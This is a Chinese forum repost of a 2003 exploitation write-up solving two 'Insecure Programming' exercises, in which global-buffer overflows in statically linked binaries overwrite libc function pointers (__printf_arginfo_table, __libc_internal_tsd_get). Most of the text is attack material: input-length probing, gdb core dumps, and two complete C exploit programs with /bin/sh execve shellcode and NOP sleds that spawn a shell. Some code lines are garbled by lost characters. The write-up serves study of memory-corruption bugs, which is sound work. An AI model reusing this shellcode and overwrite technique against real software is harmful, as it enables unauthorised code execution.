- 论坛徽章:
- 0
|
注:本文转自安全焦点(www.xfocus.org)
★ 3.4 演示四
/* e4.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* %what the hell? */
char buf[256];
int main(int argv,char **argc) {
strcpy(buf,argc[1]);
printf("live at 100%!" ;
while(1);
}
[alert7@redhat]$ gcc -o e4 e4.c -static //静态编译的时候才会出现这样的情况
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1408'`
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1409'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb -q e4 core
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
(gdb) bt
#0 0x61616161 in ?? ()
#1 0x8048681 in printf (format=0x8071548 "live at 100%!" at printf.c:31
#2 0x80481c3 in main ()
#3 0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=2,
argv=0xbffff6a4, init=0x80480b4 <_init>;, fini=0x807150c <_fini>;,
rtld_fini=0, stack_end=0xbffff69c) at ../sysdeps/generic/libc-start.c:92
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x518'``perl -e 'print "b"x891'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x62626161 in ?? ()
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x516'``perl -e 'print "b"x893'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x62626262 in ?? ()
根据上面的条件,我们可以完全不必理会printf()内部到底发生了什么。只需要知道
在buf+516的地方放入一个值,该值就会变成EIP。
/* exp_e4.c
* alert7 exploit for static e4
*/
#include <stdio.h>;
#define RET_POSITION 516
#define NOP 0x90
#define BUFADDR 0x807bbc0//0xaabbccdd
char shellcode[]=
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
int main(int argc,char **argv)
{
char buff[2048],*ptr;
int retaddr;
int i;
retaddr=BUFADDR;
if(argc>;1)
retaddr=BUFADDR+atoi(argv[1]);
bzero(buff,204 ;
for(i=0;i<2000;i++)
buff=NOP;
*((long *)&(buff[RET_POSITION]))=retaddr;
ptr=buff+50;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode;
printf("Jump to 0x%08x\n",retaddr);
execl("./e4","e4",buff,0);
}
[alert7@redhat62 alert7]$ ./exp_e4
Jump to 0x0807bbc0
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
成功
通用性没有,需猜测BUFADDR地址。
程序问题所在:
0x8050101 <_IO_vfprintf+9361>;: mov 0x807bd40(,%edx,4),%edx
0x8050108 <_IO_vfprintf+9368>;: test %edx,%edx //此时edx=0x62626262
0x805010a <_IO_vfprintf+9370>;: je 0x8050130 <_IO_vfprintf+9408>;
0x805010c <_IO_vfprintf+9372>;: add $0x28,%eax
0x805010f <_IO_vfprintf+9375>;: push %eax
0x8050110 <_IO_vfprintf+9376>;: push $0x1
0x8050112 <_IO_vfprintf+9378>;: mov 0xfffffab4(%ebp),%ecx
0x8050118 <_IO_vfprintf+9384>;: push %ecx
0x8050119 <_IO_vfprintf+9385>;: call *%edx //这里出了问题
(gdb) x 0x807bd40
0x807bd40 <__printf_arginfo_table>;: 0x61616161
只要是printf("%X";,该X为printf认识不到的或者说是自定义的格式,就会利用
__printf_arginfo_table调用相应的函数来解释该格式,而__printf_arginfo_table
数组被我们数据覆盖,所以我们可以得到控制权。
这是我的粗略的理解,具体的还需要详细的分析printf函数的执行过程。
错误之处还请斧正。
★ 3.5 演示五
/* e5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* is this possible? */
char buf[256];
int main(int argv,char **argc) {
strcpy(buf,argc[1]);
perror(argc[2]);
while(1);
}
静态编译时
(gdb) p &buf
$1 = (<data variable, no debug info>; *) 0x807bc00
[alert7@redhat]$ gcc -o e5 e5.c -static
[alert7@redhat]$ ./e5 `perl -e 'print "a"x255'` a
a: Success
[alert7@redhat]$ ./e5 `perl -e 'print "a"x256'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 chunk_alloc (ar_ptr=0x807a000, nb=4 at malloc.c:2762
2762 malloc.c: No such file or directory.
(gdb) bt
#0 chunk_alloc (ar_ptr=0x807a000, nb=4 at malloc.c:2762
#1 0x8049cf4 in __libc_malloc (bytes=44) at malloc.c:2696
#2 0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0,
language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0,
revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#3 0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US",
domainname=0xbffff630 "LC_MESSAGES/libc.mo" at finddomain.c:113
#4 0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#5 0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#6 0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#7 0x80481c7 in main ()
#8 0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>;,
fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
(gdb)
[alert7@redhat]$ ./e5 `perl -e 'print "a"x257'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 chunk_alloc (ar_ptr=0x8070061, nb=4 at malloc.c:2762
2762 malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x258'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 chunk_alloc (ar_ptr=0x8006161, nb=4 at malloc.c:2752
2752 malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x259'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 chunk_alloc (ar_ptr=0x616161, nb=4 at malloc.c:2752
2752 malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x260'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 chunk_alloc (ar_ptr=0x61616161, nb=4 at malloc.c:2752
2752 malloc.c: No such file or directory.
./e5 `perl -e 'print "a"x260'` a ---./e5 `perl -e 'print "a"x264'` a都是上面这种情况
[alert7@redhat]$ ./e5 `perl -e 'print "a"x265'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x61 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x266'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x6161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x267'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x268'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
(gdb) bt
#0 0x61616161 in ?? ()
#1 0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0,
language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_codeset=0x0, modifier=0x0, special=0x0, sponsor=0x0,
revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#2 0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US",
domainname=0xbffff630 "LC_MESSAGES/libc.mo" at finddomain.c:113
#3 0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#4 0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#5 0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#6 0x80481c7 in main ()
#7 0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffb24, init=0x80480b4 <_init>;,
fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
./e5 `perl -e 'print "a"x268'` a---./e5 `perl -e 'print "a"x364'` a都是如上
[alert7@redhat]$ ./e5 `perl -e 'print "a"x365'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282 dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>;: pushl 0x4(%eax)
(gdb) i reg eax
eax 0x61 97
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x368'` a //这以后都是老样子
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0 0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282 dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>;: pushl 0x4(%eax)
(gdb) i reg eax
eax 0x61616161 1633771873
(gdb) bt
#0 0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
#1 0x804d06d in __strerror_r (errnum=0, buf=0xbffff65c "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#2 0x80486ae in perror (s=0xbffffcc8 "a" at perror.c:38
#3 0x80481c7 in main ()
#4 0x804831b in __libc_start_main (main=0x80481a0 <main>;, argc=3, argv=0xbffffab4, init=0x80480b4 <_init>;,
fini=0x807155c <_fini>;, rtld_fini=0, stack_end=0xbffffaac) at ../sysdeps/generic/libc-start.c:92
argv[1]长度限制在268----364
buff+264的地方就是eip
/* exp_e5.c
* alert7 exploit for static e5
*/
#include <stdio.h>;
#define RET_POSITION 264
#define NOP 0x90
#define BUFADDR 0x807bc00//0xaabbccdd
char shellcode[]=
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
int main(int argc,char **argv)
{
char buff[300],*ptr;
int retaddr;
int i;
retaddr=BUFADDR;
if(argc>;1)
retaddr=BUFADDR+atoi(argv[1]);
bzero(buff,300);
for(i=0;i<299;i++)
buff=NOP;
*((long *)&(buff[RET_POSITION]))=retaddr;
ptr=buff+50;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode;
printf("Jump to 0x%08x\n",retaddr);
execl("./e5","e5",buff,"a",0);
}
[alert7@redhat62 alert7]$ ./exp_e5
Jump to 0x0807bc00 //地址中有\0 , 
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ ./exp_e5 1
Jump to 0x0807bc01
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
成功
同样跟踪了下程序
(gdb) disass __libc_malloc
Dump of assembler code for function __libc_malloc:
...
0x8049c95 <__libc_malloc+89>;: mov 0x807bd08,%eax
0x8049c9a <__libc_malloc+94>;: test %eax,%eax
0x8049c9c <__libc_malloc+96>;: je 0x8049cb0 <__libc_malloc+116>;
0x8049c9e <__libc_malloc+98>;: push $0x0
0x8049ca0 <__libc_malloc+100>;: call *%eax
...
(gdb) i reg eax
eax 0x61616161 1633771873
(gdb) x 0x807bd08
0x807bd08 <__libc_internal_tsd_get>;: 0x61616161
(gdb) p & __libc_internal_tsd_get
$2 = (void *(**)()) 0x807bd08
(gdb) p __libc_internal_tsd_get
$3 = (void *(*)()) 0x61616161
出现的问题同3.3
★ 小结:
gera就象是老师,出了这份试卷,而我则是学生做了这份试卷,所以
错误之处还请各位老师指正。或者探讨什么的都可以。有则改之,无则嘉勉。
再次感谢gera@core-sdi.com为我们出的这份试卷
http://community.core-sdi.com/~gera/InsecureProgramming/InsecureProgramming.tar.gz |
|
免费注册
发表于 2003-05-26 10:47
